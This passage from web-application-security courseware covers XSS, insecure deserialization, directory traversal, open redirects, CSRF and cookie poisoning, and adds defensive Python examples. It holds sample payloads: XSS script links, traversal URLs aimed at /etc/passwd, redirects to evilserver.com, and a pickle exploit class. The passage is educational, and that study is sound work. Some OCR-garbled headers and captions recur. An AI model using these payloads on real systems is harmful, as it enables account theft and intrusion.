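The blacklist fails because the set of dangerous constructs is open-ended; output encoding succeeds because it only needs to know the context (text, attribute, URL, script) the data is written into.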

ical andCountermensores
Mackin ©by E-Comel
Copyright
Cross-Site Scripting Attack Scenario: Attack via Email
In a cross-site scripting attack that employs email, the attacker crafts an email that contains a link to the malicious script and sends it to the victim, luring the victim into clicking the link containing the malicious script/query. For example, if the attacker finds a cross-site scripting vulnerability on the bank.com website, he/she constructs a link embedded with a malicious script such as

<A HREF=http://bank.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>>Click here</A>

and sends an email to the target user. When the user clicks the link, the URL is sent to bank.com with the malicious code. The legitimate server hosting the bank.com website sends a page back to the user including the value of clientprofile, and the malicious code is executed on the client machine. The malicious code asks the victim to enter profile information. After the user enters all the necessary personal details and clicks Submit, the attacker receives the information. The attacker can use these details to impersonate the user to gain access to the user's online bank account and perform other fraudulent activities.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure 14.17: XSS attack via email

XSS Example: Attack via Email

Figure 14.18: XSS example: attack via email

XSS Example: Stealing Users' Cookies

Figure 14.19: XSS example: stealing users' cookies

XSS Example: Sending an Unauthorized Request

Figure 14.20: XSS example: sending an unauthorized request

XSS Attack in Blog Posting
The attacker finds an XSS vulnerability in the techpost.org website, constructs a malicious script

<script>onload=window.location='http://www.certifiedhacker.com'</script>

and adds it in the comment field of TechPost. This malicious script posted by the attacker is stored on the web application's database server and runs in the background. When a user visits the TechPost website, the malicious script injected by the attacker in the TechPost comment field activates and redirects the user to the malicious website www.certifiedhacker.com.

XSS Attack in Comment Field
Many web applications use HTML pages that dynamically accept data from different sources. One can change the data in the HTML pages according to the request. Attackers use HTML web page tags to manipulate malicious data. They launch an attack by changing the comments feature using a malicious script. When the target sees the comment and activates it, the target's browser executes the malicious script to accomplish the attacker's goals.

For example, an attacker finds a vulnerable comment field in the TechPost.org website. Thus, he constructs the malicious script "<script>alert("Hello World")</script>" and adds it along with his comment in the comment field of TechPost. This malicious script, along with the comment posted by the attacker in the comment field, is stored on the web application's database server. When a user visits the TechPost website, the coded message "Hello World" pops up whenever the web page is loaded. The pop-up only proves that the injected script runs in the user's browser; in place of the alert, the attacker can run any script in that browser and subsequently perform malicious activities.

Figure: XSS attack in comment field

A8 - Insecure Deserialization
As data in the computer is stored in the form of data structures (graphs, trees, arrays, etc.), data serialization and deserialization is an effective process for linearizing and de-linearizing data objects to transport them to other networks or systems.

Serialization
Consider an example of an object "Employee" (for the Java platform), where the Employee object consists of data such as name, age, city, and EmpID. Due to the process of serialization, the object data will be converted into the following linear format for transportation to different systems or different nodes of a network.

<Employee><Name>Rinni</Name><Age>26</Age><City>Nevada</City><EmpID>2201</EmpID></Employee>

Figure 14.23: Serialization process

Deserialization
Deserialization is the reverse process of serialization, whereby the object data is recreated from the linear serialized data. Due to the process of deserialization, the serialized Employee object given in the abovementioned example will be reconverted into the object data as shown in the figure below:

<Employee><Name>Rinni</Name><Age>26</Age><City>Nevada</City><EmpID>2201</EmpID></Employee>

Figure: Deserialization process
Insecure Deserialization
This process of serialization and deserialization is used extensively in communication between networks, and its widespread usage attracts attackers to exploit the flaws in this process. Attackers inject malicious code into the serialized linear formatted data and forward the malicious serialized data to the victim. An example of malicious code injection into serialized linear data by the attacker is shown below:

<Employee><Name>Rinni</Name><Age>26</Age><City>Nevada</City><EmpID>2201</EmpID>MALICIOUS PROCEDURE</Employee>

Due to insecure deserialization, the injected malicious code will be undetected and remain present in the final execution of the deserialization code. This results in the execution of malicious procedures along with the execution of the serialized data, as shown in the following figure:

ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure 14.25: Insecure deserialization attack
This could have a severe impact on the system, as it would allow the attacker to execute code on systems remotely. Moreover, any software or server vulnerable to deserialization attacks could be adversely affected.
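The "MALICIOUS PROCEDURE" in the Employee example is abstract; in real serialization formats the procedure is a reference to a callable that the deserializer invokes while rebuilding the object graph. The following Python is an added example, not the courseware's code, using the standard library's pickle format: the attacker's byte stream names a function to call, `pickle.loads` calls it, and a restricted unpickler with an allow-list of permitted classes refuses the stream instead. The `Employee` dataclass, the benign `malicious_procedure` stand-in and the `RestrictedUnpickler` are constructed for the example.

```python
import io
import pickle
from dataclasses import dataclass


@dataclass
class Employee:
    name: str
    age: int
    city: str
    emp_id: int


EXECUTED = []   # side effects of the "malicious procedure" are recorded here


def malicious_procedure(note):
    """Benign stand-in for whatever the attacker wants run (os.system, socket.connect, ...)."""
    EXECUTED.append(note)


class Exploit:
    # pickle serializes an object by asking __reduce__ for a (callable, args) pair,
    # and pickle.loads CALLS that callable. The attacker ships the bytes; the
    # class only exists here so we can build them.
    def __reduce__(self):
        return (malicious_procedure, ("MALICIOUS PROCEDURE ran inside deserialization",))


def serialize(obj):
    return pickle.dumps(obj)


def deserialize_insecure(data):
    # Equivalent to trusting <Employee>...MALICIOUS PROCEDURE</Employee> wholesale.
    return pickle.loads(data)


# Globals a stream may reference. NEWOBJ for a dataclass needs only the class itself.
ALLOWED_GLOBALS = {(__name__, "Employee")}


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list of globals the stream may reference; everything else is refused."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def deserialize_restricted(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data):
    """Helper returning True when the restricted unpickler refuses the stream."""
    try:
        deserialize_restricted(data)
    except pickle.UnpicklingError:
        return True
    return False
```

The allow-list is a mitigation for code that must keep accepting pickle; the better design is a data-only format (JSON with schema validation) for anything that crosses a trust boundary, because then there is no callable for the stream to name.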

A9 - Using Components with Known Vulnerabilities
Components such as libraries and frameworks that are used in most web applications almost always execute with full privileges, and flaws in any component can have severe consequences. Attackers can identify weak components or dependencies by scanning or by performing manual analysis. Attackers search for any vulnerabilities on exploit sites such as Exploit Database (https://www.exploit-db.com), SecurityFocus (https://www.securityfocus.com), and Zero Day Initiative (https://www.zerodayinitiative.com). If a vulnerable component is identified, the attacker customizes the exploit as required and executes the attack. Successful exploitation allows the attacker to cause serious data loss or take over control of the servers. An attacker generally uses exploit sites to identify the web application exploits or performs vulnerability scanning using tools such as Nessus and GFI LanGuard to identify the existing vulnerable components.
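The defender's version of the attacker's search is to match the component inventory against an advisory feed before the attacker does. The following Python is an added example, not code from the courseware: a small audit that compares installed component versions with vulnerable version ranges. The component names, versions and the advisory entries (with placeholder IDs of the form ADV-EXAMPLE-n) are constructed for the example and carry no real vulnerability identifiers; a real feed would come from the vendor, OSV or NVD.

```python
import re

# Constructed inventory of the application's components (what a lockfile or
# `pip freeze` would list).
INSTALLED = {
    "legacy-xml-lib": "1.4.2",
    "webframework": "3.1.0",
    "imageconv": "0.9.8",
}

# Constructed advisory feed; hypothetical entries, no real CVE or vendor IDs.
ADVISORIES = [
    {"id": "ADV-EXAMPLE-1", "package": "legacy-xml-lib", "vulnerable": "<1.5.0",
     "summary": "external entity expansion enabled by default"},
    {"id": "ADV-EXAMPLE-2", "package": "webframework", "vulnerable": ">=3.0.0,<3.1.2",
     "summary": "unsafe deserialization of session cookie"},
    {"id": "ADV-EXAMPLE-3", "package": "imageconv", "vulnerable": "<0.9.0",
     "summary": "heap overflow in PNG decoder"},
]

_SPEC = re.compile(r"(<=|>=|<|>|==)(\d+(?:\.\d+)*)")


def parse_version(v):
    # Dotted numeric versions only; pre-releases and epochs are out of scope here
    # (use packaging.version for real version strings).
    return tuple(int(x) for x in v.split("."))


def in_range(version, spec):
    """True when version satisfies every comma-separated constraint in spec."""
    ver = parse_version(version)
    for op, bound in _SPEC.findall(spec):
        b = parse_version(bound)
        ok = {"<": ver < b, "<=": ver <= b, ">": ver > b, ">=": ver >= b, "==": ver == b}[op]
        if not ok:
            return False
    return True


def audit(installed=INSTALLED, advisories=ADVISORIES):
    """Return (id, package, installed version, summary) for every advisory that applies."""
    hits = []
    for adv in advisories:
        version = installed.get(adv["package"])
        if version is not None and in_range(version, adv["vulnerable"]):
            hits.append((adv["id"], adv["package"], version, adv["summary"]))
    return hits
```

Run this in CI against the lockfile and fail the build on any hit; the inventory is the part teams usually lack, and without it no feed helps.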

Figure 14.26: Attack on a web application with known vulnerable components

Figure 14.27: Screenshot displaying Exploit Database search results for web application exploits
A10 - Insufficient Logging and Monitoring
Web applications maintain logs to track usage patterns, such as user login and admin login events. Insufficient logging and monitoring refer to scenarios in which the detection software either does not record the malicious event or ignores the important details about the event. Attackers usually inject, delete, or tamper with the web application logs to engage in malicious activities or hide their identities. Due to insufficient logging and monitoring, the detection of malicious attempts becomes more difficult, and the attacker can perform malicious attacks, such as password brute-forcing, to steal confidential passwords.

Figure 14.28: Attack on a web application with insufficient logging and monitoring
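Recording the event is only half of it; the brute-forcing in the text is visible only if something reads the log. The following Python is an added example, not the courseware's code: a detector run over a constructed authentication log that flags sources with a burst of failed logins (a password spray across several users from one address) and then lists the successful logins from a flagged source, which are the likely compromises. The log format, addresses and user names are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed web application authentication log, one event per line.
LOG = """\
2020-06-01T10:00:01Z login FAIL user=alice src=203.0.113.7
2020-06-01T10:00:03Z login FAIL user=alice src=203.0.113.7
2020-06-01T10:00:04Z login FAIL user=bob src=203.0.113.7
2020-06-01T10:00:06Z login FAIL user=carol src=203.0.113.7
2020-06-01T10:00:07Z login FAIL user=dave src=203.0.113.7
2020-06-01T10:00:09Z login OK user=dave src=203.0.113.7
2020-06-01T10:05:00Z login FAIL user=alice src=198.51.100.9
2020-06-01T10:30:00Z login OK user=alice src=198.51.100.9
"""

LINE = re.compile(r"(?P<ts>\S+) login (?P<result>OK|FAIL) user=(?P<user>\S+) src=(?P<src>\S+)")


def parse(log=LOG):
    events = []
    for line in log.splitlines():
        m = LINE.match(line)
        if m:                       # malformed lines are skipped, not trusted
            d = m.groupdict()
            d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append(d)
    return events


def brute_force_sources(events, threshold=5, window=timedelta(minutes=1)):
    """Sources with >= threshold failed logins inside a sliding window.
    Returns {src: (first_fail_ts, number_of_distinct_users_targeted)}."""
    fails = defaultdict(list)
    for e in events:
        if e["result"] == "FAIL":
            fails[e["src"]].append(e)
    alerts = {}
    for src, evs in fails.items():
        for i in range(len(evs)):
            run = [e for e in evs[i:] if e["ts"] - evs[i]["ts"] <= window]
            if len(run) >= threshold:
                alerts[src] = (evs[i]["ts"], len({e["user"] for e in run}))
                break
    return alerts


def success_after_spray(events, alerts):
    """Successful logins from an already-flagged source: the likeliest compromises."""
    return [(e["user"], e["src"]) for e in events
            if e["result"] == "OK" and e["src"] in alerts
            and e["ts"] >= alerts[e["src"]][0]]
```

Counting distinct users per source is what separates a spray from one user mistyping a password; the same logic belongs in the SIEM rule, with the alert carrying source, window and affected accounts so the responder can act without re-reading the log.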

ical andCountermensores
Mackin ©by E-Comel
Copyright
Other Web Application Threats
Web application threats are not limited to attacks based on URL and port 80. Whatever ports, protocols, and OSI layers are in use, vendors must protect the integrity of mission-critical applications from all possible future attacks by being able to deal with all attack methods. The various types of web application threats are as follows:
- Directory Traversal
  Attackers exploit HTTP by directory traversal, which gives them access to restricted directories; they execute commands outside the web server's root directory.

- Unvalidated Redirects and Forwards
  Attackers lure victims into clicking on unvalidated links that appear to be legitimate. Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass, leading to:
  - Session fixation attack
  - Security management exploits
  - Failure to restrict URL access
  - Malicious file execution

- Watering Hole Attack
  It is an attack whereby the attacker first identifies the most visited website of the target, determines the vulnerabilities in the website, injects malicious code into the vulnerable web application, and then waits for the victim to

  browse the website. Once the victim tries to access the website, the malicious code executes, infecting the victim.

- Cross-Site Request Forgery
  The cross-site request forgery method is a type of attack in which an authenticated user is made to perform certain tasks on the web application that an attacker chooses, e.g., a user clicking on a particular link sent through an email or chat.

- Cookie/Session Poisoning
  By changing information inside a cookie, the attackers bypass the authentication process. Once they gain control over a network, they can modify its content, use the system for a malicious attack, or steal information from users' systems.

- Web Service Attacks
  An attacker can get into the target web application by exploiting an application integrated with vulnerable web services. An attacker injects a malicious script into a web service and can then disclose and modify application data.

- Cookie Snooping
  Attackers use cookie snooping on victims' systems to analyze the users' surfing habits and sell that information to other attackers or to launch various attacks on the victims' web applications.

- Hidden Field Manipulation
  Attackers attempting to compromise e-commerce websites mostly perform such attacks. They manipulate hidden fields and change the data stored in them. Several online stores face such problems every day. Attackers can alter prices and conclude transactions, designating prices of their choice.

- Authentication Hijacking
  For authenticating a user, every web application employs a user identification method such as an ID and a password. However, once attackers compromise a system, they can perform various malicious activities such as session hijacking and user impersonation.

- Application Obfuscation
  Attackers are usually careful to hide their attacks and avoid detection. Network and host-based intrusion detection systems (IDSs) constantly look for signs of well-known attacks, driving attackers to seek different ways to remain undetected. The most common method of attack obfuscation involves encoding portions of the attack with Unicode, UTF-8, Base64, or URL encoding. Unicode is a method of representing letters, numbers, and special characters to properly display them, regardless of the application or underlying platform.

- Broken Session Management
  If session IDs are exposed in the URL, then web applications are vulnerable to session fixation attacks. Furthermore, if the session timeout is long and the session IDs are not changed after every login, attackers may hijack the session and take control of it with the same privileges as the victim.

- Broken Account Management
  Vulnerable account management functions, including account update, forgotten or lost password recovery, reset password, and other similar functions, might weaken valid authentication schemes.

- Denial-of-Service (DoS)
  A DoS attack is an attack on the availability of a service, which reduces, restricts, or prevents access to system resources by its legitimate users. For instance, a website related to a banking or email service may not be able to function for a few hours or even days, resulting in the loss of time and money.

- Buffer Overflow
  A web application's buffer overflow vulnerability occurs when it fails to guard its buffer properly and allows writing beyond its maximum size.

- CAPTCHA Attacks
  CAPTCHA is a challenge-response type of test implemented by web applications to check whether the response is generated by a computer. Although CAPTCHAs are designed to be unbreakable, they are prone to various types of attacks.

- Platform Exploits
  Users can build various web applications using different platforms such as BEA WebLogic and ColdFusion. Each platform has various vulnerabilities and exploits associated with it.

- Network Access Attacks
  Network access attacks can majorly affect web applications, including a basic level of service. They can also allow levels of access that standard HTTP application methods cannot grant.

- DMZ Protocol Attacks
  The demilitarized zone (DMZ) is a semi-trusted network zone that separates the untrusted Internet from the company's trusted internal network. An attacker who can compromise a system that allows other DMZ protocols has access to other DMZs and internal systems. This level of access can lead to:
  - Compromise of the web application and data
  - Defacement of websites

ical andCountermensores
Mackin ©by E-Comel
Copyright
to internal
‘Access systems, backups,
databases,
including andsource code
Web-based Timing Attacks
Web-based timing attacks exploit side-channel leakage and estimate the amount of time taken for secret key operations. Attackers perform these attacks to retrieve usernames and passwords for accessing web applications.

MarioNet Attack
Attackers abuse the Service Workers API to inject and run malicious code in the victim's browser to perform various attacks such as cryptojacking, DDoS, click fraud, and distributed password cracking.
RC4 NOMORE Attack
A Rivest Cipher Numerous Occurrence MOnitoring and Recovery Exploit (RC4 NOMORE) attack is an attack against the RC4 stream cipher. This attack exploits the vulnerabilities present in a web server that uses the RC4 encryption algorithm for accessing encrypted sensitive information. Attackers use RC4 NOMORE to decrypt the web cookies secured by the HTTPS protocol and inject arbitrary packets. After stealing a valid cookie, the attacker impersonates the victim and logs into the website using the victim's credentials to perform malicious activities and unauthorized transactions.
Clickjacking Attack
In clickjacking, the attacker loads the target website inside a low opacity iframe. Then, the attacker designs a page such that all the clickable items such as buttons are positioned exactly as on the selected target website. When the victim clicks on the invisible elements, the attacker performs various malicious actions.
JavaScript Hijacking
JavaScript hijacking, also known as JSON hijacking, is a vulnerability that enables attackers to capture sensitive information from systems using JavaScript Object Notation (JSON) as a data carrier. These vulnerabilities arise from flaws in the web browser's same-origin policy that permits a domain to add code from another domain.
DNS Rebinding Attack
Attackers perform DNS rebinding attacks to bypass the same-origin policy's security constraints and communicate with or make arbitrary requests to local domains through a malicious web page.

Directory Traversal
When access is provided outside a defined application, there exists the possibility of unintended information disclosure or modification. Complex applications are configured with multiple directories that exist as application components and data. An application can traverse these directories to locate and execute the legitimate portions of an application. A directory traversal/forceful browsing attack occurs when the attacker is able to browse the directories and files outside the normal application access. Such an attack exposes the directory structure of an application and often the underlying web server and operating system. Directory traversal allows attackers to access restricted directories, including application source code, configuration, and critical system files, and execute commands outside the web server's root directory. With this level of access to web application architecture, an attacker can
o Enumerate the contents of files and directories
o Access pages that otherwise require authentication (and possibly payment)
o Gain secret knowledge of the application and its construction
o Discover user IDs and passwords stored in hidden files
o Locate source code and other interesting files left on the server
o View sensitive data such as customer information
Example:
The following example uses "../" to go back to several directories and obtain a file containing the backup of a web application:
http://www.targetsite.com/../../../sitebackup.zip

This example obtains the "/etc/passwd" file from a UNIX/Linux system, which contains user account information:
http://www.targetsite.com/../../../../etc/passwd
Let us consider another example in which an attacker tries to access files located outside a web publishing directory using directory traversal:
http://www.certifiedhacker.com/process.aspx?page=../../../../some dir/some file
http://www.certifiedhacker.com/../../../../some dir/some file
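The check a server should make before serving any of the request paths shown above, as an added example and not code from the EC-Council courseware: the document root and the sample request paths are constructed for the illustration. The point it shows is that the decision has to be made on the normalized absolute path, not by searching the raw string for "..", because percent-encoding, double encoding and backslashes all hide the traversal from a substring filter.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed document root for the examples below (constructed, not from the page).
WEB_ROOT = "/var/www/html"


def resolve_under_root(root: str, requested: str) -> Optional[str]:
    """Map a client-supplied path onto the filesystem, or return None if it escapes `root`.

    The request is decoded (twice, to catch double encoding) and Windows
    separators are normalized before the path is joined and normalized; only
    then is the prefix compared, so "%2e%2e/" and "..\\" are caught like "../".
    A production handler should decode exactly the way its server does.
    """
    decoded = unquote(unquote(requested))          # undo single and double encoding
    if "\x00" in decoded:                           # NUL truncates paths in some runtimes
        return None
    decoded = decoded.replace("\\", "/")            # treat Windows separators as separators
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None                                 # normalized path left the root
    return candidate


def classify_request(path: str) -> str:
    """Label a request path as 'served' or 'blocked', e.g. for a log line or WAF rule."""
    return "served" if resolve_under_root(WEB_ROOT, path) is not None else "blocked"


# Constructed sample request paths, including the shapes shown in the text above.
SAMPLE_PATHS = [
    "index.html",
    "images/logo.png",
    "../../../sitebackup.zip",
    "../../../../etc/passwd",
    "%2e%2e/%2e%2e/%2e%2e/etc/passwd",      # single-encoded dots
    "%252e%252e/%252e%252e/etc/passwd",     # double-encoded dots
    "..\\..\\windows\\win.ini",             # backslash separators
    "docs/../index.html",                   # harmless: stays under the root
]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(f"{classify_request(p):8s} {p!r} -> {resolve_under_root(WEB_ROOT, p)}")
```

Only the last two "harmless" shapes resolve to something under the root; every encoded or backslashed variant is refused by the same prefix test, which is why the check belongs on the resolved path rather than on the raw request string.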

Unvalidated Redirects and Forwards
Unvalidated redirects enable attackers to install malware or trick victims into disclosing passwords or other sensitive information, whereas unsafe forwards may allow access control bypass. An attacker sends links to unvalidated redirects and lures the victim into clicking on them. When the victim clicks on the link, thinking that it is a valid site, it redirects the victim to another site. Such redirects lead to the installation of malware and may even trick victims into disclosing passwords or other sensitive information. An attacker targets unsafe forwarding to bypass security checks. Unsafe forwarding may allow access control bypass, leading to the following:
Session Fixation Attack
In a session fixation attack, the attacker tricks or attracts the user to access a legitimate web server using an explicit session ID value.
Security Management Exploits
Some attackers target security management systems, either in networks or in the application layer, to modify or disable security enforcement. An attacker who exploits security management can directly modify protection policies, delete existing policies, add new policies, and modify applications, system data, and resources.
Failure to Restrict URL Access
An application often safeguards or protects sensitive functionality and prevents the display of links or URLs for protection. Attackers access those links or URLs directly and perform illegitimate operations.

Malicious File Execution
Malicious file execution vulnerabilities are present in most applications. The cause of this vulnerability is unvalidated input to a web server. Thus, attackers execute and process files on a web server and initiate remote code execution, install a rootkit remotely, and, in at least some cases, take complete control of the systems.
In an "unvalidated redirect" scenario, a user receives a phishing email from an attacker, luring the user into clicking the link. The link (malicious query) appears to be legitimate because it contains the name of a legitimate website such as www.certifiedhacker.com at the beginning of the URL. However, the latter part of the link contains a malicious URL (www.evilserver.com), to which it redirects the victim. When the user clicks the link, it redirects to the www.evilserver.com website, and the server that hosts the website might perform illegal activities such as harvesting the user credentials, deploying malware, and so on.
"Unvalidated forwarding" allows attackers to access sensitive pages that are generally restricted from viewing. During unvalidated forwarding, attackers request a page from a server with the forward (i.e., by entering a link with an embedded forward query) http://www.certifiedhackershop.com/purchase.jsp?fwd=admin.jsp, which reaches the server hosting the certifiedhackershop website. The server, without proper validation, redirects the attacker to the sensitive admin page, where he/she can access purchase records, registered users, and so on. Thus, using this technique, an attacker can successfully bypass any security checks.
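A server-side validator for both halves of this section, added here as an example and not taken from the courseware: redirects are accepted only as a relative path or as an absolute URL on an allowlisted host (www.certifiedhacker.com, the legitimate site named in the text, is the only entry), and forwards are resolved through a fixed name-to-page map, so a fwd=admin.jsp request has nothing to look up. The allowlist, the forward map and the sample inputs are assumptions for the illustration.

```python
from typing import Dict, Optional
from urllib.parse import urlsplit

# Hosts a redirect may point at. Only the legitimate site from the text is listed;
# the set itself is constructed for this example.
ALLOWED_REDIRECT_HOSTS = {"www.certifiedhacker.com"}

# Forwards are resolved by name through a fixed map (constructed), so a request can
# never name an arbitrary server-side page such as admin.jsp.
FORWARD_TARGETS: Dict[str, str] = {
    "purchase": "/purchase.jsp",
    "confirm": "/confirm.jsp",
}


def safe_redirect_target(target: Optional[str], default: str = "/") -> str:
    """Return a Location value that stays on the site, or `default`.

    Accepts a relative path, or an absolute http(s) URL whose host is on the
    allowlist; in the latter case only the path and query are kept, so the
    Location header never carries a host the attacker chose (including the
    "trusted@evil" userinfo trick and protocol-relative "//evil" forms).
    """
    if not target:
        return default
    if "\\" in target or any(ord(c) < 0x20 for c in target):
        return default                       # browsers treat "\" as "/" and strip control chars
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:         # absolute or protocol-relative (//evil.com)
        if parts.scheme not in ("http", "https"):
            return default                   # javascript:, data:, ...
        if (parts.hostname or "").lower() not in ALLOWED_REDIRECT_HOSTS:
            return default
    path = parts.path or "/"
    if not path.startswith("/") or path.startswith("//"):
        return default                       # "evil.com/x" without scheme, or "////evil.com"
    location = path
    if parts.query:
        location += "?" + parts.query
    return location


def resolve_forward(name: Optional[str]) -> Optional[str]:
    """Look the fwd parameter up in the allowlist; unknown names are refused."""
    if name is None:
        return None
    return FORWARD_TARGETS.get(name.strip().lower())


if __name__ == "__main__":
    for t in ["/orders", "https://www.certifiedhacker.com/account",
              "http://www.evilserver.com/", "//www.evilserver.com",
              "https://www.certifiedhacker.com@www.evilserver.com/"]:
        print(f"{t!r:60s} -> {safe_redirect_target(t)}")
    print("fwd=admin.jsp ->", resolve_forward("admin.jsp"))
```

Reducing an allowlisted absolute URL to its path is deliberate: it removes any chance that userinfo, a lookalike host or an odd number of slashes survives into the Location header.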
Figure 24.20: Unvalidated Redirects and Forwards example (unvalidated redirect and unvalidated forward)
Watering Hole Attack
In a watering hole attack, the attacker identifies the kind of websites frequently surfed by a target company/individual and tests these websites to identify any possible vulnerabilities. Once the attacker identifies the vulnerabilities, he/she injects a malicious script/code into the web application that can redirect the web page and download malware onto the victim's machine. After infecting the vulnerable web application, the attacker waits for the victim to access the infected web application. This attack is called a watering hole attack, as the attacker waits for the victim to fall into the trap, similar to a lion waiting for its prey to arrive at a watering hole to drink water. When the victim surfs the infected website, the web page redirects him/her and downloads malware onto his/her machine, compromising the machine and indeed compromising the network/organization.
Figure: Watering hole attack (attacker, malicious server, victim)
Cross-Site Request Forgery (CSRF) Attack
Cross-site request forgery (CSRF), also known as a one-click attack, occurs when a hacker instructs a user's web browser to send a request to the vulnerable website through a malicious web page. Finance-related websites commonly contain CSRF vulnerabilities. Usually, outside attackers cannot access corporate intranets; hence, CSRF is one of the methods used to enter these networks. The inability of web applications to differentiate a request made using malicious code from a genuine request exposes it to a CSRF attack. Such attacks exploit web page vulnerabilities that allow attackers to force unsuspecting users' browsers to send malicious requests that they did not intend to send. The victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the trusted site into the victim user's session, compromising its integrity.
In this scenario, the attacker constructs a malicious script and stores it on a malicious web server. When a user visits the website, the malicious script starts running and the attacker gains access to the user's browser.

Figure 14.32: Cross-Site Request Forgery (CSRF) attack example (trusted website, malicious website)
In a CSRF attack, the attacker waits for the user to connect with a trusted server and then tricks the user into clicking on a malicious link containing arbitrary code. When the user clicks on the link, it executes the arbitrary code on the trusted server. The diagram below explains the steps involved in a CSRF attack.

Client Side Code arog ita st

Malicious Code

14.33:
Figure ofCross
Working SteRequest
Forgery
(SRF)attack

ical andCountermensores
Mackin ©by E-Comel
Copyright
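The two checks a server uses to tell the forged request in the diagram apart from a genuine one, as an added example and not the courseware's code: a synchronizer token bound to the victim's session with an HMAC (which the malicious page cannot read, so it cannot include it), plus a source-origin check on the Origin or Referer header that fails closed when neither is present. The signing key, the site origin and the session identifiers are constructed for the example.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Constructed for this example: the server's signing key and the site's own origin.
SERVER_KEY = b"constructed-example-key-not-for-production"
SITE_ORIGIN = "https://www.certifiedhacker.com"

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}   # must not change state, so need no token


def issue_csrf_token(session_id: str) -> str:
    """Mint a synchronizer token: random nonce plus an HMAC binding it to this session."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: Optional[str]) -> bool:
    """Recompute the HMAC for this session and compare in constant time."""
    if not token or "." not in token:
        return False
    nonce, mac = token.rsplit(".", 1)
    expected = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def request_origin(headers: Dict[str, str]) -> Optional[str]:
    """Origin of the page that caused the request: Origin header, else the Referer's origin."""
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("origin"):
        return h["origin"].strip().lower()
    if h.get("referer"):
        p = urlsplit(h["referer"])
        if p.scheme and p.netloc:
            return f"{p.scheme}://{p.netloc}".lower()
    return None


def check_state_changing_request(method: str, headers: Dict[str, str],
                                 session_id: str, form: Dict[str, str]) -> Tuple[bool, str]:
    """Source-origin check first, then the token; both must pass for a state change."""
    if method.upper() in SAFE_METHODS:
        return True, "safe method, no state change expected"
    origin = request_origin(headers)
    if origin is None:
        return False, "no Origin or Referer header; refusing to guess"
    if origin != SITE_ORIGIN:
        return False, f"cross-site request from {origin}"
    if not verify_csrf_token(session_id, form.get("csrf_token")):
        return False, "missing or invalid CSRF token"
    return True, "accepted"


if __name__ == "__main__":
    token = issue_csrf_token("session-abc")          # embedded in the trusted site's form
    genuine = {"Origin": SITE_ORIGIN}
    forged = {"Origin": "https://www.evilserver.com"}  # the malicious page in the diagram
    print(check_state_changing_request("POST", genuine, "session-abc", {"csrf_token": token}))
    print(check_state_changing_request("POST", forged, "session-abc", {}))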
Cookie/Session Poisoning
Cookies are generally used to maintain a session between web applications and users; thus, cookies need to transmit sensitive credentials frequently. The attacker can modify the cookies' information with ease to escalate access or assume the identity of another user. Usually, the aim of a session is to uniquely bind every individual with the web application and session information that he/she is accessing. Cookie poisoning can allow an attacker to inject malicious content, modify the user's online experience, and obtain unauthorized information.
Cookies can contain session-specific data such as user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs. They exist as files stored in the client computer's memory or hard disk. A proxy can be used for rewriting the session data, displaying the cookie data, and/or specifying a new user ID or other session identifiers in the cookie. By modifying the data in a cookie, an attacker can often gain escalated access or maliciously affect the user's session. Many sites offer the ability to "Remember me?" and store the user's information in a cookie so the user does not have to re-enter the data with every visit to the site. Any private information entered is stored in a cookie. To protect cookies, site developers often encode them. Easily reversible encoding methods such as Base64 and ROT13 (rotating the letters of the alphabet through 13 characters) give a false sense of security to the users who view cookies.
Threats
Compromised cookies and sessions can provide an attacker with user credentials, allowing the attacker to access accounts and assume the identity of other users of an application. By assuming another user's online identity, attackers can review the original user's purchase history, order new items, exploit services, and access the vulnerable web application.

One of the easiest examples involves using the cookie directly for authentication. Another method of cookie/session poisoning uses a proxy to rewrite the session data, displaying the cookie data and/or specifying a new user ID or other session identifiers in the cookie. There are four types of cookies: persistent, non-persistent, secure, and non-secure. Persistent cookies are stored on a disk, whereas non-persistent ones are stored in memory. Web applications transfer secure cookies only through SSL connections.
How Cookie Poisoning Works
Web applications use cookies to simulate a stateful user browsing experience, depending on the end user and identity of the server side of web application components. Cookie poisoning alters the value of a cookie at the client side before the request is sent to the server. A web server can send a set cookie with the help of any response over the provided string and command. The cookies are stored on the users' computers and are a standard way of recognizing users. Once the web server is set, it receives all the requests from the cookies. To provide further functionality to the application, cookies support modification and analysis by JavaScript.
In this attack, the attacker sniffs the user's cookies and then modifies the cookie parameters and submits them to the web server. The server then accepts the attacker's request and processes it.

Figure 14.34: Working of Cookie Poisoning (the user browses a web page with GET /store/buy.aspx?checkout=yes HTTP/1.0; the web server replies with the requested page and sets a cookie on the user's browser; the attacker sniffs the cookie and resends the request with modified values such as the session ID, basket items, and total price; the product is delivered to the attacker's address)
